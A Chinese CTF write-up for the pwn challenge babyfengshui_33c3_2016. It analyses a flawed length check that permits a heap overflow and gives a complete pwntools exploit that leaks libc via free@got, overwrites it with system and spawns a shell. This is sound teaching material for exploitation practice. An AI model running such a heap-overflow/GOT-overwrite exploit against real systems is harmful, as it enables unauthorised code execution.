babyfengshui_33c3_2016

最新推荐文章于 2024-01-24 03:30:33 发布
最新推荐文章于 2024-01-24 03:30:33 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: BUU-PWN 文章标签: pwn python 网络安全 信息安全 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/122204753
版权

babyfengshui_33c3_2016

使用checksec查看:
在这里插入图片描述
开启了Canary和栈不可执行,看题目像是一道heap题目。

放进IDA中查看:

void __cdecl __noreturn main()
{
  char v0; // [esp+3h] [ebp-15h]
  int v1; // [esp+4h] [ebp-14h]
  size_t v2; // [esp+8h] [ebp-10h]
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  alarm(0x14u);
  while ( 1 )
  {
    puts("0: Add a user");
    puts("1: Delete a user");
    puts("2: Display a user");
    puts("3: Update a user description");
    puts("4: Exit");
    printf("Action: ");
    if ( __isoc99_scanf("%d", &v1) == -1 )
      break;
    if ( !v1 )
    {
      printf("size of description: ");
      __isoc99_scanf("%u%c", &v2, &v0);
      sub_8048816(v2);
    }
    if ( v1 == 1 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      sub_8048905(v2);
    }
    if ( v1 == 2 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      sub_804898F(v2);
    }
    if ( v1 == 3 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      sub_8048724(v2);
    }
    if ( v1 == 4 )
    {
      puts("Bye");
      exit(0);
    }
    if ( byte_804B069 > 0x31u )
    {
      puts("maximum capacity exceeded, bye");
      exit(0);
    }
  }
  exit(1);
}

看菜单,堆题,那就一步一步去分析:

首先是sub_8048816(v2)创建chunk:
在这里插入图片描述

  • s = malloc(a1);首先创建用户输入大小的chunk,里面数据置0

  • v2 = malloc(0x80u);接着会创建一个0x80大小的chunk,里面数据置0

  • *v2 = s;第一次申请的chunk的地址放入第二次申请的chunk中

跟进sub_80486BB函数:
在这里插入图片描述

  • 匹配\n :也就是说如果name不为空,将第一次申请的chunk的name存放在*v2+4

跟进sub_8048724
在这里插入图片描述

  • if ( (v3 + *ptr[a1]) >= ptr[a1] - 4 ):v3是由用户输入的,*ptr[a1]实际就是sptr[a1] - 4实际是name的地址,也就是验证chunk1和chunk2之间的距离。

接着看删除函数:
在这里插入图片描述

  • 清空数据,清空指针,没啥毛病

输出函数:
在这里插入图片描述

  • 显示数据,也没啥毛病。

update:
在这里插入图片描述

  • 就是create中的sub_8048724函数。

题目思路:

  • 判断数据长度是否合法的地方有问题,可以通过申请连续小堆块,再释放,接着申请大堆块的方式绕过。

    • 首先申请连续的3个chunk012,本题用0x80,方便计算。
    • 释放第一个结构体,得到一个空闲的0x100的堆块
    • 申请新的结构体,大小为0x100
    • 那么用户新申请的0x100大小的chunk将会在chunk1前面,程序自动申请的0x80大小的chunk将会在chunk2后面
    • 校验写入数据大小是否合法时校验的是这两个chunk之间的距离。
    • 也就是说现在我们可写入的大小是0x100+0x80+0x80+0x80+0x80
    • 修改系统创建的chunk1中存储chunk1地址的位置的数据,修改成free@got造成libc泄露。
    • 在libc中找到system的地址
    • free地址内的内容替换为system
    • 执行free(2)将会执行system(/bin/sh)

    exp:

    from pwn import *

#start 
r = remote("node4.buuoj.cn",29291)
# r = process("../buu/babyfengshui_33c3_2016")
elf = ELF("../buu/babyfengshui_33c3_2016")
libc = ELF("../buu/ubuntu16(32).so")

def add(size,name,length,text):
    r.sendlineafter("Action: ",'0')
    r.sendlineafter("description: ",str(size))
    r.sendlineafter("name: ",name)
    r.sendlineafter("text length: ",str(length))
    r.sendlineafter("text: ",text)

def delete(index):
	r.sendlineafter("Action: ", '1')
	r.sendlineafter("index: ", str(index))

def show(index):
	r.sendlineafter("Action: ", '2')
	r.sendlineafter("index: ", str(index))

def edit(index, length, text):
	r.sendlineafter("Action: ", '3')
	r.sendlineafter("index: ", str(index))
	r.sendlineafter("length: ", str(length))
	r.sendlineafter("text: ", text)

#params
free_got = elf.got['free']

#attack
add(0x80,"M1",0x80,"MMMM")
add(0x80,"M2",0x80,"MMMM")
add(0x80,"M3",0x80,"/bin/sh\x00")
# gdb.attach(r)
delete(0)
payload = b'M'*0x198 + p32(free_got)
add(0x100,"MM1",0x19c,payload)
show(1)
r.recvuntil("description: ")
free_addr = u32(r.recv(4))

#libc
base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']

#attack2
edit(1,0x4,p32(system_addr))
delete(2)

r.interactive()
m0sway
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UC10_入库用例描述1
08-08
**33c:位置不存在** - 若输入的存储位置在仓库布局中找不到,系统会提示该位置不存在,需要检查并重新输入正确的位置信息。 **33d:取消输入** - 仓库管理人员可以选择取消输入,系统会提示已取消并结束当前的入库...
Android代码-33C3 FahrPlan Schedule
08-06
This was a fork from tuxmobils FahrPlan application for 33C3 purposes. This fork is not active anymore - please head over to confi for the next iteration
buuctf-babyfengshui_33c3_2016
weixin_48807177的博客
05-04 652
ubuntu16 Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) //没开 基本就这里有点问题 if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1] - 4 ) 而重点则是在ed...
[BUUCTF]PWN——babyfengshui_33c3_2016
mcmuyanga的博客
01-02 595
babyfengshui_33c3_2016 附件 步骤: 例行检查,32位程序,开启了cannary和nx 本地运行一下看看大概的情况,熟悉的堆的菜单布局 32位ida载入,看main函数 add update delete display 上面看到了update在判断长度的时候存在问题,它的长度判断根据是:以chunk0来说,以chunk0的地址加上chunk0的长度是否等于chunk0name的地址来判断的,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的
buuctf babyfengshui_33c3_2016
weixin_45677731的博客
08-19 398
这是四个主要的函数: add函数: add函数的输入部分: 同时,这也是update函数,其实这个函数是有溢出的漏洞的,它对于长度的检查是有问题的,后面就会利用到这一点 delete函数: display函数: 先随意创建几个chunk,看看布局, add(0x80,"nam1",0x80,"aaaa") add(0x80,"nam2",0x80,"bbbb") add(0x80,"nam3",0x80,"cccc") 以第一个为例,储存text的chunk在前,后面是储存name的chunk,
babyfengshui_33c3_2016 -- house of spirit
huzai9527的博客
03-17 114
本题主要就是看懂一条判断溢出的if语句 结构体是怎么看出来的 代码上看 struct{ char *text; char name[124]; } 从内存上看 思路 step4 的关于408哪里来的 看内存地址,计算chunk3的content到chunk1的struct即可 exp from pwn import * p = remote('node3.buuoj.cn',29853) #p = process('./babyfengshui_33c3_20
wd33c93.rar_Linux/Unix编程_Unix_Linux_
08-11
标题“wd33c93.rar_Linux/Unix编程_Unix_Linux_”暗示了这是一个与Linux或Unix系统相关的编程资源,可能是一个源代码库或者一个驱动程序的实现,其中“wd33c93”可能是设备驱动的名字,可能是针对某种特定硬件的,如...
robomongo-0.9.0-rc10-windows-x86_64
10-31
根据压缩包子文件的文件名称"robomongo-0.9.0-rc10-windows-x86_64-33c89ea.exe",我们可以推断这个文件是RoboMongo的安装程序,后缀".exe"表明它是Windows平台下的可执行文件,而"33c89ea"可能是这个特定构建的唯一...
cpp_starter_kit
03-22
您将得到以下结果: Successfully built 5d4611cb33c8复制最终的十六进制数字,并运行如下: docker run -ti 然后键入以下内容以开始新的会话: ./app运行应用程序该应用程序将在构建目录的bin目录中创建。...
babyfengshui_33c3_2016[堆溢出]
、moddemod
06-26 347
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn题我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道题问题出现在更新的时候边界的判断方法有问题,结合的堆的机制,就可以形成堆溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
BUUCTF pwn babyfengshui_33c3_2016(简单堆)
菜的只能随便写写博客
02-17 2017
0x01 文件分析   0x02 运行  程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。   0x03 静态分析 主函数: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] ...
【buu】babyfengshui_33c3_2016(详细题解)
qq_62068476的博客
03-15 317
buu日常一题
babyfengshui_33c3_2016wp
wuyvle的博客
03-05 151
这是个相当好的堆题 add函数 可以看出这是个结构体 struct Node{ char * description; char name[0x7C]; } s便是description的空间地址,而v2则是结构体的空间。 delete函数 display update 这里限制了输入的长度 对于chunk0来说,就是0x80c008+输入长度是否大于0x804c08c,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的,这样的话就有了实现溢出的可能 add(0x8
[BUUCTF]-PWN:babyfengshui_33c3_2016解析
最新发布
2301_79326813的博客
01-24 653
又是一道堆题,先看保护关键信息是32位,没开pie直接看ida大致是alloc创建堆块,free释放堆块,show查看堆块内容,fill填充堆块内容其他的都没啥关键的要讲,但alloc那里非常需要解析一下解释如上图再具体一点就是 我们输入的字节大小+堆块地址>=相邻0x80堆块的地址时会被强制退出必须要 我们输入的字节大小+堆块地址
babyfengshui_33c3_2016题解
coco的博客
12-09 903
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
【CTF】【PWN】胎教向babyfengshui_33c3_2016题解
m0_50819561的博客
10-12 289
跳过checksec,我们直接分析程序。 我这里把这些函数命名为add,delete,display,edit。 先看add。 就是创建两个chunk,一个的地址存放在s里,一个的地址存放在v2里。 然后把s存在v2指向的地址里,用一个名为ptr的数组存放v2。 可以看出来,我们创建了两个chunk。按顺序命名为chunk1和chunk2.我们把这两个chunk看作是一个user的两部分。显然,chunk1存放了user的内容,chunk2存放了user的内容的地址和user的名字。 其中name
(攻防世界)(pwnbabyfengshui
PLpa的博客
08-03 1301
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
babyfengshui__BUUCTF
Jc
09-29 571
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
function _0x231129(_0x3470a4, _0x33c734) { var _0x113967 = _0xcc2e8a; if (_0x3773be[_0x113967(0x1d1)](_0x3773be[_0x113967(0x1cf)], _0x3773be[_0x113967(0x189)])) { var _0x44d653 = _0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x1b7)][_0x113967(0x1e5)](_0x3773be[_0x113967(0x19e)]) , _0x237af1 = _0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x1b7)][_0x113967(0x1e5)](_0x3773be[_0x113967(0x18b)]) , _0x90d961 = _0x3773be[_0x113967(0x1f5)] , _0x1a9696 = _0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x1ad)][_0x113967(0x1e5)](_0x90d961) , _0x1b534c = _0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x199)][_0x113967(0x186)](_0x1a9696) , _0x4430e9 = _0x29fb8c['a'][_0x113967(0x1bf)][_0x113967(0x1fe)](_0x1b534c, _0x44d653, { 'iv': _0x237af1, 'mode': _0x29fb8c['a'][_0x113967(0x1c1)][_0x113967(0x1fb)], 'padding': _0x29fb8c['a'][_0x113967(0x1f4)][_0x113967(0x18d)] }) , _0x514a58 = _0x4430e9[_0x113967(0x1f1)](_0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x1b7)]) , _0x98aae0 = _0x514a58[_0x113967(0x1f1)]() , _0x531103 = _0x3773be[_0x113967(0x18c)](Object, _0x4a5bdd['j'])(_0x3470a4) ? '' : _0x3773be[_0x113967(0x1fd)](_0x3470a4[_0x113967(0x194)](0xb, 0xc), _0x3470a4[_0x113967(0x1f9)](-0x4)); _0x531103 = _0x3773be[_0x113967(0x1fd)](_0x3773be[_0x113967(0x198)](_0x531103, _0x33c734[_0x113967(0x1f9)](-0x4)), _0x33c734[_0x113967(0x194)](0x0, 0x3)); var _0x454e4e = new _0x2188d5['a'](); return _0x454e4e[_0x113967(0x1e2)](_0x3773be[_0x113967(0x198)](_0x3773be[_0x113967(0x193)](_0x3773be[_0x113967(0x1cd)], _0x98aae0), _0x3773be[_0x113967(0x1f0)])), _0x454e4e[_0x113967(0x1b6)](_0x531103); } else { var _0x30a783 = _0x1816ee ? function() { var _0x423bcc = _0x113967; if (_0x2d57e1) { var _0x1122f3 = _0x4a1468[_0x423bcc(0x1fc)](_0x3cb105, arguments); return _0x26b175 = null, _0x1122f3; } } : function() {} ; return _0x140c19 = ![], _0x30a783; } }这段代码请用php帮我写出来
07-14
对不起,这段代码是使用 JavaScript 编写的,无法直接转换为 PHP 代码。如果您需要将其转换为 PHP,您需要了解代码的逻辑和功能,并手动将其转换为 PHP 语法。以下是对该代码的大致解释: 这是一个名为 `_0x231129` 的函数,接受两个参数 `_0x3470a4` 和 `_0x33c734`。函数体中有一个条件语句,根据条件的不同执行不同的逻辑。 如果条件满足,则执行加密操作。代码中使用了一些变量和函数,它们可能是外部引入的库或自定义函数。这些变量和函数包括 `_0x3773be`、`_0x29fb8c`、`_0x44d653`、`_0x237af1`、`_0x90d961`、`_0x1a9696`、`_0x1b534c`、`_0x4430e9`、`_0x514a58`、`_0x98aae0`、`_0x531103`、`_0x4a5bdd`、`_0x2188d5` 等等。根据函数中的代码逻辑,可以看出这段代码是进行了一种加密操作,并返回一个加密结果。 如果条件不满足,则执行一个空函数,并返回一个布尔值。 请注意,这只是对代码的大致解释,具体的转换和实现需要进一步的了解和分析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值